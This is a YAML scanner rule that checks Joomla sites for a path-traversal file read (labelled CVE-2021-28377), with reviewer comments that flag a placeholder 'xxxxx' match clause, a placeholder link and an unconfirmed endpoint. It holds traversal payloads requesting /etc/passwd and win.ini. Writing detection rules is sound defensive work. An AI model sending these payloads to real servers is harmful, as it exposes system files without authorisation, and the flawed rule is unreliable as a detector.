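# Detection rule: checks whether a Joomla site returns the contents of a
# well-known system file when a path-traversal sequence is placed in a query
# parameter. A match means the server disclosed a file from outside the web
# root; remediation is patching the affected component and rejecting
# traversal sequences in file parameters.
#
# NOTE(review): the nesting below was reconstructed. The flattened original
# repeated `request`, `expression` and `cache` at one level, which a YAML
# parser either rejects or resolves last-wins, dropping r0 entirely.
#
# NOTE(review): the requests target a generic `f` parameter on /index.php.
# Confirm this matches the vulnerable endpoint described in the advisory for
# the CVE named below before relying on a negative result.
name: poc-yaml-joomla-cve-2021-28377-fileread
manual: true
transport: http
rules:
  # r0: Unix-like targets. Matches an /etc/passwd style "root" entry.
  r0:
    request:
      # Presumably lets the scanner reuse a response for an identical
      # request; confirm against the scanner's rule schema.
      cache: true
      method: GET
      path: /index.php?f=../../../../../../../etc/passwd
    # NOTE(review): the trailing contains("xxxxx") clause is AND-ed with the
    # file-content check, so the rule only fires when the body also holds the
    # literal string "xxxxx". That looks like an unfilled placeholder; a real
    # passwd file will not contain it, which makes this a false negative.
    # Replace it with the intended marker or remove the clause.
    expression: 'response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body) && response.body_string.contains("xxxxx")'
  # r1: Windows targets. Matches the stock win.ini header text.
  r1:
    request:
      cache: true
      method: GET
      path: /index.php?f=../../../../../../../Windows/win.ini
    # NOTE(review): same placeholder "xxxxx" clause as r0; see the note there.
    expression: 'response.status == 200 && response.body.bcontains(b"for 16-bit app support") && response.body_string.contains("xxxxx")'
# The target is reported as affected when either platform check matches.
expression: 'r0() || r1()'
detail:
  author: Chaitin
  links:
    # NOTE(review): placeholder URL. Point this at the vendor advisory or
    # CVE record so a finding can be triaged and the fix version looked up.
    - http://example.com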